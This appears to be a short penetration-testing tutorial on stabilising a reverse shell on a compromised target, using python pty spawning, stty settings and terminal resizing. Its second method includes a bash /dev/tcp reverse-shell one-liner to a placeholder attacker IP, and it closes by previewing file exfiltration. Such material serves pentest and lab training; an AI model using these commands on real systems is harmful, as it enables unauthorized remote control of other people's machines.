Upgrading your reverse shell
Author
Nick Chua
Date Published
After we have gotten our reverse shell, it will have limitations such as no auto-completions and messy file listings. Here is how we can make our shell better inside our target’s system.
Upgrading and stabilising your shell enables you to type in your commands better. There are several ways to upgrade your shell once you are in a target machine.
First way
For this method to work, we have to check if our target machine has python2 or python3 installed via:
1which python2which python3
Assuming you are running bash, in your reverse shell, run the command below for whichever version of python available in the target machine:
1python3 -c "import pty; pty.spawn('/bin/bash')"
Press on your keyboard: Ctrl + Z
On your local host:
1stty raw -echo; fg
Press on your keyboard: Enter (twice)
If your shell formatting is off, simply enter the command:
1reset
Notice that our shell does not cover our entire terminal. To fix this, we shall open another terminal tab and input the following commands:
1echo $TERM
Output: xterm-256color
1stty size
Output: 70 255
In our reverse shell:
1export TERM=xterm-256color2stty rows 70 columns 255
Our reverse shell should now utilize the terminal’s full features!
Second way
Check the version of python the target system is running in using: which python or which python3
Next,
1python3 -c 'import pty;pty.spawn("/bin/bash")' //Upgrade to tty2Ctrl + Z //Background the process3stty raw -echo4fg + Enter
Subsequently, turn your unstable shell into a stable one via:
1bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"
Thank you for reading!
After gaining initial access, often times we will need to exfiltrate files out of the target system to our local machine.